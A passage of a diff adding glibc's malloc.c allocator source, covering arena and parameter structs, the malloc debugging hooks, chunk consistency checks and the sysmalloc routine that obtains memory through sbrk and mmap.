+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+
+/*  Non public mallopt parameters.  */
+#define M_ARENA_TEST -7
+#define M_ARENA_MAX  -8
+
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((p->prev_size + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (next->prev_size == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_non_main_arena (p))
+        assert (av != &main_arena);
+      else
+        assert (av == &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+                  p->prev_size = correction;
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+                      chunk_at_offset (old_top, old_size)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
